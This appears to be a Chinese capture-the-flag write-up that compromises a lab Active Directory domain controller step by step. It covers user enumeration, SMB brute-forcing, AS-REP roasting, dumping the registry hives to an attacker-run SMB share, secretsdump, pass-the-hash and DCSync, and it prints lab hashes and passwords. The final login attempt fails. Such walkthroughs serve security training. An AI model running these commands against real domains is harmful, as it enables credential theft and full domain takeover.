难度:Medium
kali:192.168.56.104
靶机:192.168.56.126
> arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:05 (Unknown: locally administered)
192.168.56.100 08:00:27:77:db:85 PCS Systemtechnik GmbH
192.168.56.126 08:00:27:be:ce:fb PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.946 seconds (131.55 hosts/sec). 3 responded端口扫描
> nmap 192.168.56.126 -sS -sV -p- -T5 -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-16 11:12 CST
Nmap scan report for christmas.hmv (192.168.56.126)
Host is up (0.00025s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-16 18:13:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49689/tcp open msrpc Microsoft Windows RPC
49709/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:BE:CE:FB (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 14h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-07-16T18:14:02
|_ start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:be:ce:fb (Oracle VirtualBox virtual NIC)
TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms christmas.hmv (192.168.56.126)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.39 seconds跟DC1开放端口情况一样,还是先进行常规的SMB服务探测
SMB探测
smbmap -H 192.168.56.126 -u anonymous
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s) 这次一点匿名共享目录都没有,不能lookupsid了,先找下域名吧
> ldapsearch -H ldap://192.168.56.126 -x -s base -b '' "(objectClass=*)" "*" +
ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL
dnsHostName: DC01.SOUPEDECODE.LOCAL域名还是SOUPEDECODE.LOCAL,添加到hosts
192.168.56.126 dc01.soupedecode.local soupedecode.local然后利用Kerbrute枚举一下用户名
> ./kerbrute_linux_amd64 userenum --dc 192.168.56.126 -d soupedecode.local /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/16/24 - Ronnie Flathers @ropnop
2024/07/16 14:25:29 > Using KDC(s):
2024/07/16 14:25:29 > 192.168.56.126:88
2024/07/16 14:25:29 > [+] VALID USERNAME: charlie@soupedecode.local
2024/07/16 14:25:29 > [+] VALID USERNAME: Charlie@soupedecode.local
2024/07/16 14:25:29 > [+] VALID USERNAME: administrator@soupedecode.local
2024/07/16 14:25:30 > [+] VALID USERNAME: Administrator@soupedecode.local
2024/07/16 14:25:30 > [+] VALID USERNAME: CHARLIE@soupedecode.local
2024/07/16 14:26:37 > [+] VALID USERNAME: wreed11@soupedecode.local拿到一些用户名保存起来,然后跑一下密码
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.56.126:445 - 192.168.56.126:445 - Starting SMB login bruteforce
[+] 192.168.56.126:445 - 192.168.56.126:445 - Success: '.\charlie:charlie'
[!] 192.168.56.126:445 - No active DB -- Credential data will not be saved!
[+] 192.168.56.126:445 - 192.168.56.126:445 - Success: '.\Charlie:charlie'
[-] 192.168.56.126:445 - 192.168.56.126:445 - Failed: '.\administrator:charlie',
[-] 192.168.56.126:445 - 192.168.56.126:445 - Failed: '.\administrator:administrator',
[-] 192.168.56.126:445 - 192.168.56.126:445 - Failed: '.\Administrator:charlie',
[-] 192.168.56.126:445 - 192.168.56.126:445 - Failed: '.\Administrator:Administrator',
[+] 192.168.56.126:445 - 192.168.56.126:445 - Success: '.\CHARLIE:charlie'
[-] 192.168.56.126:445 - 192.168.56.126:445 - Failed: '.\wreed11:charlie',
[-] 192.168.56.126:445 - 192.168.56.126:445 - Failed: '.\wreed11:wreed11',
[*] 192.168.56.126:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.56.126:445 - Bruteforce completed, 3 credentials were successful.
[*] 192.168.56.126:445 - You can open an SMB session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed拿到一组账号密码charlie:charlie
lookupsid
看一下目录
> smbmap -H 192.168.56.126 -u charlie -p charlie
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.56.126:445 Name: christmas.hmv Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share 访问了一下几个开放的目录,并没有什么东西。IPC$开放,可以尝试lookupsid.
> lookupsid.py charlie@192.168.56.126
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Password:
[*] Brute forcing SIDs at 192.168.56.126
[*] StringBinding ncacn_np:192.168.56.126[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\Administrator (SidTypeUser)
501: SOUPEDECODE\Guest (SidTypeUser)
502: SOUPEDECODE\krbtgt (SidTypeUser)
512: SOUPEDECODE\Domain Admins (SidTypeGroup)
513: SOUPEDECODE\Domain Users (SidTypeGroup)
514: SOUPEDECODE\Domain Guests (SidTypeGroup)
515: SOUPEDECODE\Domain Computers (SidTypeGroup)
516: SOUPEDECODE\Domain Controllers (SidTypeGroup)
517: SOUPEDECODE\Cert Publishers (SidTypeAlias)
518: SOUPEDECODE\Schema Admins (SidTypeGroup)
519: SOUPEDECODE\Enterprise Admins (SidTypeGroup)
520: SOUPEDECODE\Group Policy Creator Owners (SidTypeGroup)
521: SOUPEDECODE\Read-only Domain Controllers (SidTypeGroup)
522: SOUPEDECODE\Cloneable Domain Controllers (SidTypeGroup)
...把用户名导出来
cat user.txt | awk '{print substr($2, 13)}' > username.txt再去爆破一下smb
msf6 auxiliary(scanner/smb/smb_login) > run
[+] 192.168.56.126:445 - 192.168.56.126:445 - Success: '.\charlie:charlie'没收获。
AS-REP Roasting攻击
先尝试kerberoasting攻击
> GetUserSPNs.py -request -dc-ip 192.168.56.126 soupedecode.local/charlie
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Password:
No entries found!尝试AS-REP Rroasting攻击
> GetNPUsers.py -usersfile username.txt -no-pass -dc-ip 192.168.56.126 soupedecode.local/
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User bmark0 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User otara1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User kleo2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eyara3 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pquinn4 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jharper5 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bxenia6 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gmona7 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User oaaron8 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pleo9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User evictor10 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wreed11 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bgavin12 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ndelia13 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User akevin14 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User kxenia15 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ycody16 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User qnora17 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dyvonne18 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User qxenia19 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rreed20 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User icody21 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ftom22 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ijake23 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rpenny24 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jiris25 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User colivia26 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pyvonne27 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zfrank28 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ybob317 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User file_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User charlie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User qethan32 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User khenry33 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sjudy34 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rrachel35 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User caiden36 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User xbella37 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smark38 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:e5697462f07ce86dc5706de972c92a93$11bf6eae5807576755b8287618864bd5b7129080c466b93eac9363c08dbb3a3e3735a9ce5427b0be525f0f9cdb78fb40ad1b377762f9b9c461c6656a60014e235d71154d6ac041899b424f8b8a206b0be3e8a2c5947eb7cb5f6ae2da6d7c853bc7ac3e37f7c0bab1eda9acbe06d4a2cce00cf97cc7656e2f01e254e01df04fc5275a9fb3a05f91529bf2a8b5177775595248d025c26f05589261a6b038269128c72a1ad699437c9c1c545b1e042db0659a789cd4eca954939eb80da0268f2962027783dd90ccd80d1a1eb4c07772fad5537f3020f3eee5c18e9f2be7d38d32b1ac40066ec988ba72f10adfd378ccec5b5f2e4e0fbe71拿到了zximena448用户的AS-REP哈希,破解一下试试
> john aaa --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
internet ($krb5asrep$23$zximena448@SOUPEDECODE.LOCAL)
1g 0:00:00:00 DONE (2024-07-16 15:16) 100.0g/s 33600p/s 33600c/s 33600C/s smokey..olivia
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 密码是internet
smb看一下共享目录
> crackmapexec smb 192.168.56.126 -u zximena448 -p internet --shares
SMB 192.168.56.126 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.56.126 445 DC01 [+] SOUPEDECODE.LOCAL\zximena448:internet
SMB 192.168.56.126 445 DC01 [+] Enumerated shares
SMB 192.168.56.126 445 DC01 Share Permissions Remark
SMB 192.168.56.126 445 DC01 ----- ----------- ------
SMB 192.168.56.126 445 DC01 ADMIN$ READ Remote Admin
SMB 192.168.56.126 445 DC01 C$ READ,WRITE Default share
SMB 192.168.56.126 445 DC01 IPC$ READ Remote IPC
SMB 192.168.56.126 445 DC01 NETLOGON READ Logon server share
SMB 192.168.56.126 445 DC01 SYSVOL READ Logon server share > smbclient \\\\192.168.56.126\\c$ -U zximena448
Password for [WORKGROUP\zximena448]:
Try "help" to get a list of possible commands.
smb: \> ls
$WinREAgent DH 0 Sun Jun 16 03:19:51 2024
Documents and Settings DHSrn 0 Sun Jun 16 10:51:08 2024
DumpStack.log.tmp AHS 12288 Wed Jul 17 10:02:30 2024
pagefile.sys AHS 1476395008 Wed Jul 17 10:02:30 2024
PerfLogs D 0 Sat May 8 16:15:05 2021
Program Files DR 0 Sun Jun 16 01:54:31 2024
Program Files (x86) D 0 Sat May 8 17:34:13 2021
ProgramData DHn 0 Sun Jun 16 10:51:08 2024
Recovery DHSn 0 Sun Jun 16 10:51:08 2024
System Volume Information DHS 0 Sun Jun 16 03:02:21 2024
Users DR 0 Tue Jun 18 02:31:08 2024
Windows D 0 Wed Jul 17 07:11:18 2024
12942591 blocks of size 4096. 10926157 blocks available
smb: \> cd Users
smb: \Users\> ls
. DR 0 Tue Jun 18 02:31:08 2024
.. DHS 0 Wed Jul 17 10:04:40 2024
Administrator D 0 Sun Jun 16 03:56:40 2024
All Users DHSrn 0 Sat May 8 16:26:16 2021
Default DHR 0 Sun Jun 16 10:51:08 2024
Default User DHSrn 0 Sat May 8 16:26:16 2021
desktop.ini AHS 174 Sat May 8 16:14:03 2021
Public DR 0 Sun Jun 16 01:54:32 2024
zximena448 D 0 Tue Jun 18 02:30:22 2024
12942591 blocks of size 4096. 10926157 blocks available
smb: \Users\> cd zximena448
smb: \Users\zximena448\> cd Desktop
smb: \Users\zximena448\Desktop\> dir
. DR 0 Tue Jun 18 02:31:24 2024
.. D 0 Tue Jun 18 02:30:22 2024
desktop.ini AHS 282 Tue Jun 18 02:30:22 2024
user.txt A 33 Thu Jun 13 04:01:30 2024
12942591 blocks of size 4096. 10926137 blocks available
smb: \Users\zximena448\Desktop\> get user.txt
getting file \Users\zximena448\Desktop\user.txt of size 33 as user.txt (3.2 KiloBytes/sec) (average 3.2 KiloBytes/sec)拿到user flag了。
提权
先ldap搜一手信息
> ldapsearch -x -H ldap://192.168.56.126 -D "zximena448@soupedecode.local" -w internet -b "dc=soupedecode,dc=local" "(objectClass=*)" | grep memberOf
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Domain Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Enterprise Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Schema Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Administrators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Guests,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=SOUPEDECODE,DC=L
memberOf: CN=Users,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Administrators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Administrators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Users,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Guests,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Backup Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL可以看到这个用户是个备份操作员,可以利用这一点拿到注册表文件
先起个smb服务方便把备份文件传过来
> impacket-smbserver -smb2support "share" .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed> impacket-reg "soupedecode.local"/"zximena448":"internet"@"192.168.56.126" backup -o '\\192.168.56.104\share'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\192.168.56.104\share\SAM.save
[*] Saved HKLM\SYSTEM to \\192.168.56.104\share\SYSTEM.save
[*] Saved HKLM\SECURITY to \\192.168.56.104\share\SECURITY.save用secretsdump提取一下哈希
> secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save local
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction failed: ('unpack requires a string argument of length 2', "When unpacking field 'PekID | <H=0 | ''[:2]'")
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:7ab9e5f668e4fbdb7661b11a476e69ce1c7a7c0adc4695844049b921cfbe33b5cdb144d2673b6301c78717a275d9002a1056c17be2dbe4f97cbf74ce12d80e3fb51a93305addb136ae910c8fc08d96856531b526db8c7d211d29c25e50ab2f39982e736bb0a8e4a1ca0c0d8ba29747129aabe86dfe17c765f2f867a2225a882f08bd38677e4bf6cbec816721658658f7071884875694d2fd553c1251054896c1eab827f0c5ca2dae2632c0070f442bff837736d1b69ee63c755a6b77944765159c8fcffa7f946c79e045b117f27a1cc669e19add9380e5b16e49215a04c445e1ab673cefa21a17948ea8b3f918b1ea9f
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:967fdb37b05f099f6659ab8196ec4db1
[*] DPAPI_SYSTEM
dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4
dpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503
[*] NL$KM
0000 44 C5 ED CE F5 0E BF 0C 15 63 8B 8D 2F A3 06 8F D........c../...
0010 62 4D CA D9 55 20 44 41 75 55 3E 85 82 06 21 14 bM..U DAuU>...!.
0020 8E FA A1 77 0A 9C 0D A4 9A 96 44 7C FC 89 63 91 ...w......D|..c.
0030 69 02 53 95 1F ED 0E 77 B5 24 17 BE 6E 80 A9 91 i.S....w.$..n...
NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991
[*] Cleaning up..PTH
拿到一个$MACHINE.ACC 的哈希,尝试哈希传递攻击
> crackmapexec smb 192.168.56.126 -u username.txt -H 967fdb37b05f099f6659ab8196ec4db1
SMB 192.168.56.126 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Administrator:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Guest:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Domain:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Domain:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Domain:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Domain:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Domain:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Cert:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Schema:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Group:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Read-only:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Cloneable:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Protected:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Key:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\RAS:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Allowed:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Denied:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [+] SOUPEDECODE.LOCAL\DC01$:967fdb37b05f099f6659ab8196ec4db1 DC01$验证成功,用secretsdump导出一下哈希
> secretsdump.py soupedecode.local/'DC01$'@192.168.56.126 -hashes :967fdb37b05f099f6659ab8196ec4db1
```bash
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8982babd4da89d33210779a6c5b078bd:::拿到Administrator的ntlm哈希,直接登录winrm
l-winrm -i 192.168.56.128 -u Administrator -H 8982babd4da89d33210779a6c5b078bd
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type Errno::EHOSTUNREACH happened, message is No route to host - No route to host - connect(2) for "192.168.56.128" port 5985 (192.168.56.128:5985)
Error: Exiting with code 1
~/Desktop 30s root@kali2 16:42:36
